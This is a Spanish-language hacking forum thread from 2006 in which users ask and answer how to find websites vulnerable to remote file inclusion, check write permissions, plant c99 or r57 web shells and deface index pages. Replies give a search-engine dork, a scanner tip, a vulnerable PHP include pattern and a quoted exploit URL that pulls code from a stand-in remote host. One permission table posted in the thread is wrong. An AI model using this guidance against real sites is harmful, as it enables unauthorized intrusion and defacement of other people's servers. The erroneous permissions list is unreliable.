hola, es mi primer post ;D
we aca va la pregunta ¿ hay alguna forma de buscar webs vulnerables a RFI q no sea poniendo "allinurl:?page"?
mmm primero selecciona la page y escanea con acuentix, ya te busco unos tutos o te hago unos videos...
Komtec1
a y otra ¿como hago para saver si tiene derechos de escritura? ???
bye!
Quote from: user0 on October 25, 2006, 09:38:32 PM
a y otra ¿como hago para saver si tiene derechos de escritura? ???
bye!
todo depende de la shell ke estes utilizando
tenes conocimientos de sistemas *NIX?? (linux, etc)
digo asi identificas los permisos xD
Los permisos son:
d : lectura
r : escritura
w : ejecución
Permisos de archivos en formato binario y octal.
Binario Octal Permisos
000 0 ---
001 1 --x
010 2 -w-
011 3 -wx
100 4 r--
101 5 r-x
110 6 rw-
111 7 rwx
por ejemplo puedes modificar todo si tienes permisos 777 ... mm pero todo es cuestion de ke keres defacear ... saludos
Quote from: FR34K on October 25, 2006, 11:58:10 PM
Los permisos son:
d : lectura
r : escritura
w : ejecución
Si no me equivoco era::
r: read
w: write
x: execution
No es necesario tener permisos de root para hacer un simple Deface pero para un Mass Deface si es necesario.
Quote from: porq69 on October 26, 2006, 12:04:42 AM
Si no me equivoco era::
r: read
w: write
x: execution
No es necesario tener permisos de root para hacer un simple Deface pero para un Mass Deface si es necesario.
te equivocas ..man ... si estas haciendo rfi ... y no tenes permisos de escritura .. o Safe mode como pensas modificarle el index???????
no estoy hablando de deface mediante una inyeccion html tipo <h1>Yo te haxoree</h1> estoy hablando de deface con rfi (remote file inclusion) si keres te subo una shell a mi fto y proba cambiarme el index a ver si podes... saludos
Quote from: porq69 on October 26, 2006, 12:04:42 AM
No es necesario tener permisos de root para hacer un simple Deface pero para un Mass Deface si es necesario.
Lo q quise decir es q no es necesario tener privilegios de Root para hacer el Deface si con permisos de escritura es suficiente, aunque si consiges ser root podrias hacer deface a todas la paginas q se encuentran en el servidor.
Quote from: porq69 on October 26, 2006, 12:16:08 AM
Lo q quise decir es q no es necesario tener privilegios de Root para hacer el Deface si con permisos de escritura es suficiente, aunque si consiges ser root podrias hacer deface a todas la paginas q se encuentran en el servidor.
debo aprender a leer ... sorry :( :P
lo q quiero saber es: como me doy cuenta en q parte de la web meter la shell :-[, las shell q tengo son la c99 y la r57
bye ;)
si no me ekivoco va despues del "="tushell"
pero como uds saben.. de deface se muy pokito xDD
Saludos..
Deyabu Roolz
Quote from: Deyabu Roolz on October 26, 2006, 06:01:13 PM
si no me ekivoco va despues del "="tushell"
pero como uds saben.. de deface se muy pokito xDD
Saludos..
Deyabu Roolz
no, eso lo se lo que pregunto es si siempre va en el index o en otra parte?
bye ;)
No necesariamente deve estar en el index, todo depende donde se encuentra el bug... Este bug de RFI es mayormente por errores de programacion, por ejemplo un error comun en php es:
<?
include ($url);
?> Nunca un progrtamador de php deve poner una variable dentro de un include...
Si vemos este RFI en Milw0rm (http://www.milw0rm.com/exploits/2653) podemos ver lo siguiente
#Exploit :
#
#http://localhost/path/include.php?path=http://EvElCoDe.txt?
#http://localhost/path/functions.php?path=http://EvElCoDe.txt?
Si pensamos por un momento en el error podemos sacar q el programador escribio
<?
include ($path);
?> en la q "path" seria la variable vulnerable por estar dentro de un include sin ningun tipo de filtrado.
lee aki hice una guia rapida de como detectar RFI 8) http://hackpr.net/foro/index.php?topic=5194.0
Muy bueno, gracias Fr34k... :-*
:D :D :D :D :DGRACIAS!!! a tods :D :D :D :D
Siempre hay q darle las gracias ;) ;) ;) ;) d lo mejor man!!
Fr3aK te felicito Grax por el Manual ! man!! ;D